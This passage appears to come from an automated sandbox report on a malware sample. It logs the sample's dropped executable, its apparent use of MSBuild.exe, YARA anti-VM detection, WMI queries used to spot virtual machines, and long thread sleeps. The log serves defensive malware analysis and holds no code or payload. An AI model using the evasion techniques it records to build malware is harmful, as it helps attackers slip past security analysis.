Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jYRIGnZlROed.exe PID: 7360, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 5600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 6600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 6730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 7730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 9DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: ADE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: BDE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: C270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: D270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: E270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: F270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 10BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 11BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 12BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Memory allocated: 13BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 15B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 3150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 5150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 5830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 6830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 6960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 7960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 9A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: AA00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: BA00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 5830000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 6840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: 6840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: A130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: BE90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Memory allocated: CE90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1230000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C80000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196735

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7173	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1570	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 947	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1839	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 8744

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe TID: 6700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496	Thread sleep count: 947 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496	Thread sleep count: 1839 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -99014s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7480	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7736	Thread sleep count: 1093 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7736	Thread sleep count: 8744 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -99015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -98030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -97921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -97812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -97703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -97593s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199955s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199828s >= -30000s
